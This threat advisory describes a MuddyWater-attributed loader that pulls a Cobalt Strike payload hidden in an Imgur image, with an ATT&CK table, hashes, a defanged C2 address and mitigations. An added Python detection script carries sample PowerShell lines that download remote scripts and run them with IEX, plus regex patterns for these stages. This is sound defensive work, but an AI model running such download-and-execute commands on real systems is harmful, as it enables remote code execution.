Advisory: Malware Intelligence
Potential Threat Actors: MuddyWater
Targeted Platform: Windows
Malware Execution
When the malware is executed in the infected environment, it launches a PowerShell script, which downloads a second PowerShell script hosted on GitHub. That script then downloads a PNG image from the image hosting platform Imgur.com; the image hides an encoded Cobalt Strike payload in its pixels. After downloading the image, the PowerShell script decodes the payload, which in turn enables the Cobalt Strike beacon to connect to the attackers' infrastructure. Cobalt Strike masquerades as EICAR, the anti-malware test file, to connect to the C2 server. The account that holds the PowerShell script on GitHub.
Tactics, Techniques, and Procedures
Tactic | Technique ID | Technique
Initial Access | T1566.001 | Phishing: Spearphishing Attachment
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1027.003 | Obfuscated Files or Information: Steganography
Command and Control | T1001.002 | Data Obfuscation: Steganography
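The execution chain described under Malware Execution and the techniques tabulated above (T1059.001, T1027.003) leave a recognisable footprint in PowerShell script-block logs. The following is an added example, not part of the advisory: a small triage script that flags the stage combinations of the chain. It assumes Script Block Logging (Event ID 4104) is collected; the sample log entries are constructed, and the hostnames (raw.githubusercontent.com, i.imgur.com) and the System.Drawing/GetPixel decoding pattern are assumptions about how such a loader typically looks, not indicators taken from this advisory.

```python
import re

# Constructed sample PowerShell script-block log entries (Event ID 4104 style),
# NOT from the advisory: the first two mimic the described chain with placeholder
# URLs, the last two are benign activity used as negatives.
SAMPLE_SCRIPT_BLOCKS = [
    "$s = (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/repo/main/stage2.ps1'); IEX $s",
    "$wc = New-Object Net.WebClient; "
    "$wc.DownloadFile('https://i.imgur.com/EXAMPLE.png', $env:TEMP + '\\a.png'); "
    "$img = New-Object System.Drawing.Bitmap($env:TEMP + '\\a.png'); "
    "$p = $img.GetPixel(0, 0); IEX $decoded",
    "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Remove-Item",
    "Invoke-WebRequest https://i.imgur.com/EXAMPLE.png -OutFile wallpaper.png",
]

# One regex per stage of the chain. The hostnames and the System.Drawing/GetPixel
# pattern are assumptions about how such a loader typically looks, not IoCs
# taken from the advisory.
DOWNLOADERS = r"(DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|iwr)"
STAGES = {
    "github_download": re.compile(
        r"(?i)" + DOWNLOADERS + r"[^;]*?(raw\.githubusercontent\.com|github\.com)"),
    "imgur_image_download": re.compile(
        r"(?i)" + DOWNLOADERS + r"[^;]*?imgur\.com/\S+\.(png|jpg|gif)"),
    "pixel_decode": re.compile(r"(?i)System\.Drawing\.Bitmap[\s\S]*?\.GetPixel\("),
    "in_memory_exec": re.compile(r"(?i)\b(IEX|Invoke-Expression)\b"),
}

def classify(script_block: str) -> list[str]:
    """Return the sorted names of chain stages present in one script block."""
    return sorted(name for name, rx in STAGES.items() if rx.search(script_block))

def is_suspicious(stages: list[str]) -> bool:
    """Alert only on combinations that separate the loader from benign use: an
    Imgur image fetch plus pixel-level decoding (steganography), or a GitHub
    download fed straight into in-memory execution. A lone image download is
    not enough, which keeps ordinary Imgur traffic out of the alert queue."""
    s = set(stages)
    stego_chain = {"imgur_image_download", "pixel_decode"} <= s
    remote_exec = {"github_download", "in_memory_exec"} <= s
    return stego_chain or remote_exec

def triage(script_blocks: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, stages) for every block that warrants analyst attention."""
    return [(i, s) for i, b in enumerate(script_blocks)
            if is_suspicious(s := classify(b))]
```

Run against real 4104 data the hostnames should be widened to whatever public hosting services your environment legitimately uses, so the combination logic, not a single domain, carries the alert.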
Indicators of Compromise
- d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
- Ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866
- Domain:Port: Mazzion1234-44451[.]portmap[.]host:44451
- URL: hxxp://Mazzion1234-44451.portmap.host/fVRO
Impact
Technical Impact:
- The malware is responsible for downloading Cobalt Strike
- The infection can lead to further attacks on the victims
Business Impact:
- Privacy violation
- Victims are exposed to other attacks
Mitigation
- Treat any attachment delivered by email with caution
- Keep systems updated with the latest patches
- Apply effective application control policies